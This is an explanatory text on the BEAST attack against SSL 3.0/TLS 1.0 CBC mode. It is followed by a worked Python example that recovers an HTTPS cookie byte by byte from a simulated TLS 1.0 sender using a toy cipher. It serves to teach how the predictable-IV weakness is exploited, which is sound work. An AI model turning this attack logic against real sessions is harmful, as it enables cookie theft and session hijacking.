HyperText Transfer Protocol (HTTP) is a stateless protocol. To provide continuity for communications between an HTTP client and an HTTP server (also known as a web server), the HTTP client will store a cookie containing information set by the web server, and will include that information in a cookie header in subsequent HTTP requests to the web server. For example, the cookie header may include a session identifier.
Transport Layer Security (TLS) is the industry standard for exchange of data over a secure channel, used with online banking, e-commerce and payment sites, and also used as the underlying security for virtual private networks (VPNs). Initially, a TLS channel is established: public key infrastructure (PKI) certificates authenticate the server (and optionally the client), and a key exchange generates at each end of the channel a shared secret from which the keys protecting the channel are derived. Symmetric cryptographic techniques then use this shared secret, known as a session key, to exchange data in a secure manner over the TLS channel; the record layer of SSL 3.0 and TLS 1.0 typically does so with a block cipher in cipher-block-chaining (CBC) mode.
Secure Sockets Layer (SSL) 3.0 and TLS 1.0 suffer from a known vulnerability in their use of CBC mode: the initialization vector (IV) of each record is the last ciphertext block of the preceding record, so an attacker who observes the channel knows the IV that will be used for the next record before it is encrypted. This predictable IV makes the protocols susceptible to a blockwise chosen-plaintext attack, described by W. Dai and others as early as 2002. Until recently, it was generally believed that such a chosen-plaintext attack could not feasibly be carried out against HTTPS communications, because the attacker must both observe the encrypted traffic and cause the victim's client to encrypt plaintext of the attacker's choosing at a chosen block boundary.
In September 2011, Juliano Rizzo and Thai Duong presented at the Ekoparty conference in Argentina an attack on TLS 1.0/SSL 3.0 that enables them to decrypt HTTPS client requests on the fly and hijack sessions between an HTTPS client and a web server. The attack uses a tool called BEAST (Browser Exploit Against SSL/TLS) that enables them to grab and decrypt HTTPS cookies from active user sessions, such as supposedly confidential sessions with sensitive sites such as online banking, e-commerce and payment sites (e.g. PayPal™). The tool uses what is known as a blockwise chosen-boundary attack: script running in the victim's browser causes the client to send requests in which an attacker-controlled prefix positions one unknown byte of the cookie as the last byte of a cipher block whose other bytes are known, and the attacker then tests each of the 256 candidate values for that byte by having the client encrypt a chosen block and comparing the result with the observed ciphertext. The weakness lies in the CBC chaining of TLS 1.0/SSL 3.0 and applies to any CBC-mode cipher suite, including those using the Advanced Encryption Standard (AES); it is not a weakness of the AES algorithm itself. TLS 1.1 and later use an explicit, unpredictable IV for each record, which removes this weakness.
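The following is an added worked example, not code from the original text or from the BEAST tool, that carries out the blockwise chosen-boundary attack described above against a model of TLS 1.0 CBC chaining. It generalizes the one-byte step to recover a whole cookie of any length, including bytes that fall in later cipher blocks. Assumptions: a toy keyed Feistel permutation stands in for AES (the attack only uses the fact that the block cipher is a fixed permutation, so it works identically with AES or 3DES); TLS padding and the MAC are omitted and records are zero-padded; the `Victim` class models the two capabilities BEAST needs, namely controlling a prefix of each request that the cookie follows and making the client send one fully chosen block; the secret cookie value is constructed for the example.

```python
import functools
import hashlib
import operator
import os

BLOCK = 16  # 128-bit blocks, as with AES-CBC in TLS 1.0


def xor(*parts):
    """Byte-wise XOR of equal-length byte strings."""
    return bytes(functools.reduce(operator.xor, t) for t in zip(*parts))


def toy_block_encrypt(key, block):
    """Stand-in for AES (assumption): a 4-round keyed Feistel permutation on 16-byte blocks.
    The attack never inverts it; it only relies on E(key, .) being a fixed permutation."""
    left, right = block[:8], block[8:]
    for i in range(4):
        f = hashlib.sha256(key + bytes([i]) + right).digest()[:8]
        left, right = right, xor(left, f)
    return left + right


class Tls10CbcSender:
    """Models TLS 1.0 CBC chaining: the IV of record n+1 is the last ciphertext block of record n."""

    def __init__(self, key, iv):
        self.key = key
        self.prev = iv  # chained IV, visible on the wire to a passive observer

    def send_record(self, plaintext):
        out = bytearray()
        for i in range(0, len(plaintext), BLOCK):
            self.prev = toy_block_encrypt(self.key, xor(plaintext[i:i + BLOCK], self.prev))
            out += self.prev
        return bytes(out)


class Victim:
    """The browser: attacker script controls a prefix of each request and the cookie follows it."""

    def __init__(self, secret):
        self.secret = secret
        self.sender = Tls10CbcSender(os.urandom(16), os.urandom(BLOCK))

    def send_request(self, prefix):
        pt = prefix + self.secret
        pt += bytes(-len(pt) % BLOCK)  # toy zero padding in place of TLS padding (assumption)
        return self.sender.send_record(pt)

    def send_chosen(self, block):
        """BEAST's second capability: make the client encrypt one fully attacker-chosen block."""
        return self.sender.send_record(block)


def beast_recover(victim, secret_len):
    """Recover secret_len cookie bytes, at most 256 chosen records per byte."""
    last = victim.send_request(b"")[-BLOCK:]  # observe one record to learn the next IV
    recovered = b""
    for k in range(secret_len):
        prefix = b"A" * ((BLOCK - 1 - k) % BLOCK)  # align secret[k] to the end of a block
        b = (len(prefix) + k) // BLOCK             # index of the block holding secret[k]
        ct = victim.send_request(prefix)
        iv_b = last if b == 0 else ct[(b - 1) * BLOCK:b * BLOCK]  # IV that block b was chained to
        target = ct[b * BLOCK:(b + 1) * BLOCK]
        last = ct[-BLOCK:]
        known15 = (prefix + recovered)[b * BLOCK:]  # everything in block b except its last byte
        assert len(known15) == BLOCK - 1
        for g in range(256):
            guess = known15 + bytes([g])
            # Client computes E(chosen ^ last) = E(guess ^ iv_b), which equals target iff guess == P_b
            last = victim.send_chosen(xor(guess, iv_b, last))
            if last == target:
                recovered += bytes([g])
                break
        else:
            raise RuntimeError("no candidate byte matched; model inconsistent")
    return recovered


if __name__ == "__main__":
    cookie = b"Cookie: sid=deadbeef01"  # constructed sample secret
    print(beast_recover(Victim(cookie), len(cookie)))
```

The check in the inner loop is the whole attack: because the next record's IV (`last`) is already known, XORing it into the chosen block cancels it, so the client ends up encrypting `guess ^ iv_b`, exactly what it encrypted for the real block `P_b`. A per-record random IV, as in TLS 1.1 and later, makes `last` unknown at the time the chosen block is built and the equality test no longer works.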